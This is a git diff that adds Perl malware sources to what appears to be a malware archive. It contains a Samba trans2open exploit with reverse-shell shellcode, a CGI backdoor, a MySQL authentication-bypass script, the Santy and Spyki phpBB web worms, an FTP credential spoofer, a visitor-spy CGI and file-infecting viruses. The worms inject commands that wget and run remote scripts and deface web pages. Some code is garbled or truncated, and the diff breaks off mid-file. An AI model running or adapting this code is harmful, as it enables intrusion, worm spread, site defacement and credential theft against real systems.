+ $a4 = chr(ord($a4) ^ 0x93); + + my ($p1, $p2) = split(//, reverse(pack("s", $Port))); + $p1 = chr(ord($p1) ^ 0x93); + $p2 = chr(ord($p2) ^ 0x93); + + my $exploit = + # trigger the trans2open overflow + "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". + "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90". + + GetNops(830) . + + # xor decoder courtesy of hsj + "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01". + "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30". + "\x93\x40\xe2\xfa". + + # reverse-connect, code by bighawk + "\xa2\x5a\x64\x72\xc2\xd2\xc2\xd2\xc2\xc2\x23\xf2\x5e\x13\x1a\x50". + "\xfb". $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2. + "\xf5\xc2\x1a\x75\x21\x83\xc1\xc5\xc3\xc3\x23\xf1\x5e\x13\xd2\x23". + "\xc9\xda\xc2\xc0\xc0\x5e\x13\xd2\x71\x66\xc2\xfb\xbc\xbc\xe0\xfb". + "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc2\xc7\xc0\xc0\x23\xa8\x5e\x13". + + GetNops(87) . + + "010101". + $RetAddr. + $IckAddr. + $RetAddr. + $IckAddr. + "101010". + + "DDI!". ("\x00" x 277); + + return $exploit; +} + +sub Unblock { + my $fd = shift; + my $flags; + $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n"; + fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n"; +} + +sub GoAway { + exit(0); +} + +sub ReadResponse { + my ($s) = @_; + my $sel = IO::Select->new($s); + my $res; + my @fds = $sel->can_read(4); + foreach (@fds) { $res .= <$s>; } + return $res; +} + +sub HexDump { + my ($data) = @_; + my @x = split(//, $data); + my $cnt = 0; + + foreach my $h (@x) + { + if ($cnt > 16) + { + print "\n"; + $cnt = 0; + } + + printf("\\x%.2x", ord($h)); + $cnt++; + } + print "\n"; +} + +# thank you k2 ;) +sub GetNops { + my ($cnt) = @_; + my @nops = split(//,"\x99\x96\x97\x95\x93\x91\x90\x4d\x48\x47\x4f\x40\x41\x37\x3f\x97". + "\x46\x4e\xf8\x92\xfc\x98\x27\x2f\x9f\xf9\x4a\x44\x42\x43\x49\x4b". + "\xf5\x45\x4c"); + return join ("", @nops[ map { rand @nops } ( 1 .. $cnt )]); +} diff --git a/Perl/HackTool.Perl.Ulgin b/Perl/HackTool.Perl.Ulgin new file mode 100644 index 00000000..022cfab2 --- /dev/null +++ b/Perl/HackTool.Perl.Ulgin @@ -0,0 +1,48 @@ +# jerusalem (c) 2001 +# heavily untested and on_the_fly done cgi (i've written this code on my +# organizer) - jerusalem@digitalmaphia.com / j3rus4lem@users.sourceforge.net +$password = "phj34r"; # as usual +## -note +## if you don't want to show your password in clear (in the sourcecode) +## use perl's crypt() function. a bogus example of this can be found +## into http://sgxxx.net/users/jerusalem/ulogin.pl *subliminal message* +use CGI qw/:standard/; +print header, +start_html('cgi backdoor - jerusalem\@digitalmaphia.com 2001'), +h1('cgi backdoor - jerusalem\@digitalmaphia.com 2001'), +start_form, +"password: ",password_field('pass'),p, +"port: ",textfield('port'), +# if you want your pass shown in clear just subst the password_field() function +# with a textfield() one +submit, +end_form, +hr; +if (param()) { +$pass = "<EM>"."$password"."</EM>"; +if (em(param('pass')) eq $pass) { werk(); } +else { stfu(); } +sub stfu { print "password incorrect. sorry.\n"; } +hr; +} +# This subroutine is a little and bogus example of what you can do +# using a perl cgi. In this case, a daemon like the unix' echo is +# started and forked under a pid. +sub werk { +$aaa = em(param('port')); +$aaa =~ s/<.*?>//g; +my $pid = fork(); if ($pid) { exit(); } +yeha(); +sub yeha { +use IO::Socket; +my $port = $aaa; +my $socket = IO::Socket::INET->new(Listen => 5, + LocalPort => $port, + Proto => 'tcp', + Reuse => 1); +while ($new = $socket->accept()) { $new->autoflush(1); command(); } +sub command { while (<$new>) { $comm = $_; chomp $comm; +print $new "$comm\n"; +command(); } } +} +} diff --git a/Perl/HackTool.Perl.VulnTest.a b/Perl/HackTool.Perl.VulnTest.a new file mode 100644 index 00000000..176a11c6 --- /dev/null +++ b/Perl/HackTool.Perl.VulnTest.a @@ -0,0 +1,139 @@ +# +# The script connects to MySQL and attempts to log in using a zero-length password +# Based on the vuln found by NGSSecurity +# +# The following Perl script can be used to test your version of MySQL. It will display +# the login packet sent to the server and it's reply. +# +# Exploit copyright (c) 2004 by Eli Kara, Beyond Security +# elik beyondsecurity com +# +use strict; +use IO::Socket::INET; + +usage() unless ((@ARGV >= 1) || (@ARGV <= 3)); + +my $username = shift(@ARGV); +my $host = shift(@ARGV); +if (!$host) +{ + usage(); +} +my $port = shift(@ARGV); +if (!$port) +{ +$port = 3306; print "Using default MySQL port (3306)\n"; +} + +# create the socket +my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); +$socket or die "Cannot connect to host!\n"; + +# receive greeting +my $reply; +recv($socket, $reply, 1024, 0); +if (length($reply) < 7) +{ +print "Not allowed to connect to MySQL!\n"; +exit(1); +} +print "Received greeting:\n"; +HexDump($reply); +print "\n"; + +# here we define the login OK reply +# my $login_ok = "\x01\x00\x00\x02\xFE"; + +# break the username string into chars and rebuild it +my $binuser = pack("C*", unpack("C*", $username)); + +# send login caps packet with password +my $packet = "\x85\xa6". + "\x03\x00\x00". + "\x00". + "\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc.. + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash + +substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1) + +print "Sending caps packet:\n"; +HexDump($packet); +print "\n"; +send $socket, $packet, 0; + +# receive reply +recv($socket, $reply, 1024, 0); +print "Received reply:\n"; +HexDump($reply); + +my @list_bytes = unpack("C*", $reply); + +#print "The fifth byte is: ", $list_bytes[4], "\n"; +if (length(@list_bytes) >= 4) +{ +print "Response insufficent\n"; +} + +#if ($reply eq $login_ok) +if ($list_bytes[4] == 0 || $list_bytes[4] == 254) +{ +print "Received OK reply, authentication successful!!\n"; +} +else +{ +print "Authentication failed!\n"; +} + +# close +close($socket); + + +sub usage +{ + # print usage information + print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n +<username> - The DB username to authenticate as +<host> - The host to connect to +[port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n"; + exit(1); +} + + +### +# do a hexdump of a string (assuming it's binary) +### +sub HexDump +{ +my $buffer = $_[0]; + +# unpack it into chars +my @up = unpack("C*", $buffer); +my $pos=0; + +# calculate matrix sizes +my $rows = int(@up/16); +my $leftover = int(@up%16); + +for( my $row=0; $row < $rows; $row++, $pos+=16) +{ + printf("%08X\t", $pos); + my @values = @up[$pos .. $pos+15]; + my @line; + foreach my $val (@values) + { + push(@line, sprintf("%02X", $val)); + } + print join(' ', @line), "\n"; +} +# print last line +printf("%08X\t", $pos); +my @values = @up[$pos .. $pos+$leftover-1]; +my @line; +foreach my $val (@values) +{ + push(@line, sprintf("%02X", $val)); +} +print join(' ', @line), "\n"; +} \ No newline at end of file diff --git a/Perl/Net-Worm.Perl.Santy.c b/Perl/Net-Worm.Perl.Santy.c new file mode 100644 index 00000000..b819a58f --- /dev/null +++ b/Perl/Net-Worm.Perl.Santy.c @@ -0,0 +1,212 @@ +# +# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept) +# -SECU For educational purpose +# +# See : http://isc.sans.org/diary.php?date=2004-12-21 +# http://www.f-secure.com/v-descs/santy_a.shtml +# +use +strict; +use Socket; + +sub PayLoad(); +sub DoDir($); +sub DoFile ($); +sub GoGoogle(); + +sub GrabURL($); +sub str2chr($); + +eval{ fork and exit; }; + +my $generation = x; +PayLoad() if $generation > 3; + +open IN, $0 or exit; +my $self = join '', <IN>; +close IN; +unlink $0; + +while(!GrabURL('http://www.google.com/advanced_search')) { +if($generation > 3) +{ +PayLoad() ; +} else { +exit; +} +} + +$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e; + +my $selfFileName = 'm1ho2of'; +my $markStr = 'HYv9po4z3jjHWanN'; +my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"'; +my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527'; + +while(1) { +exit if -e 'stop.it'; + +OUTER: for my $url (GoGoogle()) { + +exit if -e 'stop.it'; + +$url =~ s/&highlight=.*$//; +$url .= $tryCode; +my $r = GrabURL($url); +next unless defined $r; +next unless $r =~ /$markStr/; + +while($self =~ /(.{1,20})/gs) { +my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName) . ',' . str2chr('a') . '), +' . str2chr($1) . '),exit%252e%2527'; + +$url =~ s/&highlight=.*$//; +$url .= $portion; + +next OUTER unless GrabURL($url); +} + +my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) . ')%252e%2527'; +$url =~ s/&highlight=.*$//; +$url .= $syst; + +GrabURL($url); +} +} + + + +sub str2chr($) { +my $s = shift; + +$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg; +$s =~ s/%252e$//; + +return $s; +} + + +sub GoGoogle() { +my @urls; +my @ts = qw/t p topic/; +my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' . '& +q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000)) . +'%22&btnG=Search'; +my $goo1st = GrabURL($startURL) +fined $goo1st; +my $allGoo = $goo1st; +my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif width=16 height=26 +alt="" border=0><br>\d+</a>'; +while($goo1st =~ m#$r#g) { +$allGoo . = GrabURL('www.google.com' . $1); +} +while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) { +my $u = $1; +next if $u =~ m#http://.*http://#i; # no redirects +push(@urls, $u); +} + +return @urls; +} + + +sub GrabURL($) { +my $url = shift; +$url =~ s#^http://##i; + +my ($host, $res) = $url =~ m#^(.+?)(/.*)#; +return unless defined($host) && defined($res); + +my $r = +"GET $resHTTP/1.0\015\012" . +"Host: $host\015\012" . +"Accept:*/*\015\012" . +"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" . +"Pragma: no-cache\015\012" . +"Cache-Control: no-cache\015\012" . +"Referer: http://" . $host . $res . "\015\012" . + +"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" . +"Connection: close\015\012\015\012"; + +my $port = 80; +if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;} + +my $internet_addr = inet_aton($host) or return; +socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return; +setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000); + +connect(Server, sockaddr_in($port, $internet_addr)) or return; +select((select(Server), $| = 1)[0]); +print Server $r; + +my $answer = join '', <Server>; +close (Server); + +return $answer; +} + + +sub DoFile($) { +my $s = q{ +<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> +<HTML><HEAD><TITLE>This site is defaced!!! + +

    This site is defaced!!!

    +
    NeverEverNoSanity WebWorm generation } +. $generation .q{.
    + +}; + +unlink $_[0]; +open OUT, ">$_[0]" or return; +print OUT $s; +close OUT; +} + + +sub DoDir($) { + +my $dir = $_[0]; +$dir .= '/' unless $dir =~ m#/$#; + +local *DIR; +opendir DIR, $dir or return; + +for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) { + +unless(-l $dir . $ent) { +if(-d _) { +DoDir($dir . $ent); +next; +} +} + +if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i +or $ent =~ /\.phtm/i) { +DoFile($dir . $ent); +} +} + +closedir DIR; +} + + +sub Pay Load() { + +my @dirs; + + +eval{ +while(my @a = getpwent()) { push(@dirs, $a[7]);} +}; + +push(@dirs, '/ '); + +for my $l ('A' .. 'Z') { +push(@d +for my $d (@dirs) { +DoDir($d); +} +} +//milw0rm.com diff --git a/Perl/Net-Worm.Perl.Spyki.a b/Perl/Net-Worm.Perl.Spyki.a new file mode 100644 index 00000000..d8546475 --- /dev/null +++ b/Perl/Net-Worm.Perl.Spyki.a @@ -0,0 +1,109 @@ +#/usr/bin/perl + +##################### +#### +#### #### #### #### #### #### #### # # # # #### +#### # # # # # # # # # # # # # # +#### #### # # ### ## #### # #### ## ### +#### # # # # # # # # # # # # # +#### # #### #### # # #### #### # # # # #### +#### +use IO::Socket; +use LWP::Simple; +my $processo = "/usr/local/sbin/httpd - spy"; +$SIG{"INT"} = "IGNORE"; +$SIG{"HUP"} = "IGNORE"; +$SIG{"TERM"} = "IGNORE"; +$SIG{"CHLD"} = "IGNORE"; +$SIG{"PS"} = "IGNORE"; + +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Problema com o fork: $!" unless defined($pid); + +while(1){ +@vul = ""; +$a=0; +$numero = int rand(999); +$site = "www.google.com"; +$procura = "inurl:viewtopic.php?t=$numero"; + +###################################### +for($n=0;$n<900;$n += 10){ +$sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next; +print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n"; +@resu = <$sock>; +close($sock); +$ae = "@resu"; +while ($ae=~ m/
    .*?<\/a>/){ + $ae=~ s/.*?<\/a>/$1/; + $uber=$1; +if ($uber !~/translate/) +{if ($uber !~ /cache/) +{if ($uber !~ /"/) +{if ($uber !~ /google/) +{if ($uber !~ /216/) +{if ($uber =~/http/) +{if ($uber !~ /start=/) +{ +if ($uber =~/&/) + { + $nu = index $uber, '&'; + $uber = substr($uber,0,$nu); + } +$vul[$a] = $uber; +$a++; +}}}}}}}}} +########################## +for($cadenu=1;$cadenu <= 991; $cadenu +=10){ + +@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next; +$ae = "@cade"; + +while ($ae=~ m/.*?<\/em>/){ + $ae=~ s/(.*?)<\/em>/$1/; + $uber=$1; + +$uber =~ s/ //g; +$uber =~ s///g; +$uber =~ s/<\/b>//g; +$uber =~ s///g; + +if ($uber =~/&/) + { + $nu = index $uber, '&'; + $uber = substr($uber,0,$nu); + } +$vul[$a] = $uber; +$a++ +}} + +######################### + + +$wb = '&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527'; + + +$b = scalar(@vul); + +for($a=0;$a<=$b;$a++) +{ +$sitevul = $vul[$a] . $wb; +if($sitevul !~/http/){ $sitevul = 'http://' . $sitevul; } + +$teste1 = get($sitevul) or next; +$teste1 = ""; +} +} + + + + + + + + + + + diff --git a/Perl/Net-Worm.Perl.Spyki.b b/Perl/Net-Worm.Perl.Spyki.b new file mode 100644 index 00000000..5ebb03a6 --- /dev/null +++ b/Perl/Net-Worm.Perl.Spyki.b @@ -0,0 +1,212 @@ + +use LWP::Simple; +use IO::Socket::INET; + + + + +my $processo = "/usr/local/sbin/httpd - spy"; +$SIG{"INT"} = "IGNORE"; +$SIG{"HUP"} = "IGNORE"; +$SIG{"TERM"} = "IGNORE"; +$SIG{"CHLD"} = "IGNORE"; +$SIG{"PS"} = "IGNORE"; + +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Problema com o fork: $!" unless defined($pid); + +while(1){ +$numr = int rand(9999); +$caxe = "."; +$caxe1 = "."; +$caxe .= rand(9999); +$caxe1 .= rand(9999); +$arq = "."; +$arq = int rand(9999); + +open(sites,">$arq"); +print sites ""; +close(sites); + + +$procura = 'inurl:*.php?*=' . $numr; + +for($n=0;$n<900;$n += 10){ +$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next; +print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n"; +@resu = <$sock>; +close($sock); +$ae = "@resu"; +while ($ae=~ m/.*?<\/a>/){ + $ae=~ s/.*?<\/a>/$1/; + $uber=$1; + if ($uber !~/translate/) + { + if ($uber !~ /cache/) + { + if ($uber !~ /"/) + { + if ($uber !~ /google/) + { + if ($uber !~ /216/) + { + if ($uber =~/http/) + { + if ($uber !~ /start=/) + { + open(arq,">>$arq"); + print arq "$uber\n"; + close(arq); +}}}}}}}}} + + +for($cadenu=1;$cadenu <= 991; $cadenu +=10){ + +@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next; +$ae = "@cade"; + +while ($ae=~ m/.*?<\/em>/){ + $ae=~ s/(.*?)<\/em>/$1/; + $uber=$1; + +$uber =~ s/ //g; +$uber =~ s///g; +$uber =~ s/<\/b>//g; + +open(a,">>$arq"); +print a "$uber\n"; +close(a); +}} + +$ark = $arq; +@si = ""; +open (arquivo,"<$ark"); +@si = ; +close(arquivo); +$novo =""; +foreach (@si){ +if (!$si{$_}) +{ +$novo .= $_; +$si{$_} = 1; +} +} +open (arquivo,">$ark"); +print arquivo $novo; +close(arquivo); + + +$a =0; +$b =0; +open(ae,"<$arq"); +while() + {$sites[$a] = $_; + chomp $sites[$a]; + $a++; + $b++;} +close(ae); + +for ($a=0;$a<=$b;$a++){ +open (file, ">$caxe"); + print file ""; +close(file); +open (file, ">$caxe1"); + print file ""; +close(file); +$k=0; +$e=0; + $data=get($sites[$a]) or next; + while($data=~ m/.*?<\/a>/){ + $data=~ s/.*?<\/a>/$1/; + $ubersite=$1; + + if ($ubersite =~/"/) + { + $nu = index $ubersite, '"'; + $ubersite = substr($ubersite,0,$nu); + } +if ($ubersite !~/http/) + {$ubersite = $sites[$a].'/'.$ubersite;} +open(file,">>$caxe") || die("nao abriu caxe.txt $!"); +print file "$ubersite\n"; +close(file); +} + +$lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt'; +$t =0; +$y =0; +@ja; +open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt"; +while () +{ + $ja[$t] = $_; + chomp $ja[$t]; + $t++; + $y++; +} +close(opa); +$t=1; +while ($t < $y) + { + if ($ja[$t] =~/=/) + { + $num = rindex $ja[$t], '='; + $num += 1; + $ja[$t] = substr($ja[$t],0,$num); + open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt"; + print jaera "$ja[$t]$lista1\n"; + close(jaera); + $num = index $ja[$t], '='; + $num += 1; + $ja[$t] = substr($ja[$t],0,$num); + $num1 = rindex $ja[$t], '.'; + $subproc = substr($ja[$t],$num1,$num); + + open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt"; + print jaera "$ja[$t]$lista1\n"; + close(jaera); + } + $t++; + } +$ark = "$caxe1"; +@si = ""; +open (arquivo,"<$ark"); +@si = ; +close(arquivo); +$novo =""; +foreach (@si){ +if (!$si{$_}) +{ +$novo .= $_; +$si{$_} = 1; +} +} +open (arquivo,">$ark"); +print arquivo $novo; +close(arquivo); + $q=0; + $w=0; + @hot; + open (ops,"<$caxe1"); + while() + { + $hot[$q] = $_; + chomp $hot[$q]; + $q++; + $w++; + } + close(ops); + +for($q=0;$q<=$w;$q++) + { + + if ($hot[$q] =~/http/) + { + $tipo=get($hot[$q]) or next; + }} + + +} +} diff --git a/Perl/Spoofer.Perl.Nicl b/Perl/Spoofer.Perl.Nicl new file mode 100644 index 00000000..d5ac79aa --- /dev/null +++ b/Perl/Spoofer.Perl.Nicl @@ -0,0 +1,73 @@ +# This is a simple tcp server that listens on port 21 +# unless another is specified. +# The possible uses of this are; +# Ftp has no encryption for passwords and they are +# sent in plain text under the right conditions. +# Most ftp programs have a text file called .ini +# which will store the info like site-name, user-name, encrypted +# password and account-name. Instead of trying to decrypt the +# password for each different application (ws_ftp etc) +# do this. +# Edit the .ini +# Wherever there is a site-name change it to 127.0.0.1 +# Start your this perl scipt +# Open your ftp program and click connect + +# Most of this coding was already in the /perl/eg/ folder +# you can find the orginal version there .. + +print "===========================\n"; +print " Manicx local FTP spoofer\n"; +print " www.infowar.co.uk/manicx/\n"; +print "===========================\n"; + +($port) = @ARGV; +$port = 21 unless $port; # Are port is 21 unless specified + +$AF_INET = 2; +$SOCK_STREAM = 1; + +$sockaddr = 'S n a4 x8'; + +($name, $aliases, $proto) = getprotobyname('tcp'); +if ($port !~ /^\d+$/) { ($name, $aliases, $port) = getservbyport($port, 'tcp');} + +print "Port = $port\n"; + +$this = pack($sockaddr, $AF_INET, $port, "\0\0\0\0"); + +select(NS); $| = 1; select(stdout); + +socket(S, $AF_INET, $SOCK_STREAM, $proto) || die "socket: $!"; +bind(S,$this) || die "bind: $!"; +listen(S,5) || die "connect: $!"; + +select(S); $| = 1; select(stdout); + +print "Listening for connection..\n"; + +($addr = accept(NS,S)) || die $!; + +print "Accept ok\n"; + +($af,$port,$inetaddr) = unpack($sockaddr,$addr); +@inetaddr = unpack('C4',$inetaddr); + +print NS "220\n"; # We are ok for login (send username) +$user = ; +print $user; + +print NS "331\n"; # user ok send password +$pass = ; +print $pass; + +print NS "331\n"; # password ok send account +$acco = ; +print $acco; + +print NS "200\n"; # account ok send what you want. + +$resp = ; +print $resp; + +print NS "451\n"; # bye bye baby \ No newline at end of file diff --git a/Perl/Trojan.Perl.InfoSpy b/Perl/Trojan.Perl.InfoSpy new file mode 100644 index 00000000..f0702538 --- /dev/null +++ b/Perl/Trojan.Perl.InfoSpy @@ -0,0 +1,60 @@ +#/usr/bin/perl +################################################ +# # +#**********************************************# +#* _ _ *# +#* |\_\\-\ /-//_/| *# +#* | \\-| |-// | *# +#* \ /~\\_____//~\ / *# +#* ` / \ ┤ *# +#* | () () | Comando Trojan *# +#* \ ^ / -=- *# +#* ||||| www.comandotrojan.cjb.net *# +#* ||||| *# +#* *# +#**********************************************# +# # +# Vai Abaixo o CGI InfoSpy by iradium # +# # +# Por Favor Preserve estas Linhas # +# # +# chmod 755 # +# # +################################################ + + +print "Content-type: text/html\n\n"; + +$c = "contador.txt"; +#Nome do .txt log +$mailprog = "/usr/sbin/sendmail -t"; +#Preste Atenчуo o real caminho do email no seu server +$emailadm = "seu_email\@seu_site.com.br; +#Deixe o \ no email +$vitima = "lamer_entrou@se_fudeu.com"; +#Deixe como estar +#Lembrar de fazer um domэnio tipo www.entrem.cjb.net e por index.cgi + +print <; +close (N); + +$n++; + +open (NE, ">$c"); +print NE "$n"; +close (NE); + + open (MAIL, "|$mailprog") || print "Can't open $mailprog +.\n"; + print MAIL "To: $vitima \n"; + print MAIL "From: $emailadm\n"; + print MAIL "Subject: Visita\n\n"; + print MAIL "$ENV{'REMOTE_ADDR'} \n $ENV{'HTTP_USER_AGENT'} \n $ENV{'REMOTE_HOST'} \n $ENV{'REMOTE_USER'} $n\n\n "; + close MAIL; + +#FIM DO ARQUIVO \ No newline at end of file diff --git a/Perl/Virus.Perl.DirWorm b/Perl/Virus.Perl.DirWorm new file mode 100644 index 00000000..b2b7fc5b --- /dev/null +++ b/Perl/Virus.Perl.DirWorm @@ -0,0 +1,13 @@ +# DirWorm by -Byst- (c) 1999 +while (<*>) # Ищем все ф йлы в текущей директории +{ + if (chdir($_)) { # Если это директория - сменить текущую н нее + @command = ("cp ../worm.pl ./worm.pl > /dev/null"); + system @command; # Вызов системной функции копиров ния ф йл + chdir(".."); # Возр щ емся обр тно в н ч льную директорию + } +} +@command = ("cp ./worm.pl ../worm.pl"); +system @command; # Копируем тело в родительскую директорию + + diff --git a/Perl/Virus.Perl.Endsnow.a b/Perl/Virus.Perl.Endsnow.a new file mode 100644 index 00000000..3d1facc0 --- /dev/null +++ b/Perl/Virus.Perl.Endsnow.a @@ -0,0 +1,31 @@ + + opendir(DIR, "."); #open the directory this program is in + @FILES = readdir(DIR); #get the file names + closedir(DIR); + + ## Look for programs to spread to (limited to the current directory for now) + for ($i = 0; $i < @FILES; $i++) { + if (substr($FILES[$i], length($FILES[$i]) - 4) eq ".cgi" || substr($FILES[$i], length($FILES[$i]) - 3) eq ".pl") { + $TARGETS[$ii] = $FILES[$i]; + $ii++; + } + } + + for ($i = 0; $i < @TARGETS; $i++) { + open(FILE,$TARGETS[$i]); + $file = join("",); + close(FILE); + if (index($file, "## Perl Virus Begins Now ##") == -1) { ##the file isn't infected, INFECT IT!! (append to it) + if ($me eq "") { #what we want to write hasn't been copied yet, this is a considerate virus, it could just keep copying itself each time and slow your computer down (and become a couple hundred bytes smaller)... + open(me,$0); #opens THIS program + $me = join("",); + $start = index($me,"## Perl Virus Begins Now ##"); + $me = substr($me, $start, rindex($me,"## Perl Virus Ends Now##") + 24 - $start); + close(me); + } + open(FILE,">>$TARGETS[$i]"); + print FILE $me; + close(FILE); + } + } + closedir(DIR); diff --git a/Perl/Virus.Perl.Intender b/Perl/Virus.Perl.Intender new file mode 100644 index 00000000..17fa2fbe --- /dev/null +++ b/Perl/Virus.Perl.Intender @@ -0,0 +1,66 @@ +#here virus starts +# Intender by -Byst- (c) 1999 +$source = __FILE__; +while (<*.pl>) +{ + $name = $_; # Имя ф йл -жертвы + $cname = crypt($name,$name); # Имя промежуточного ф йл + + # Проверим не инфициров н ли 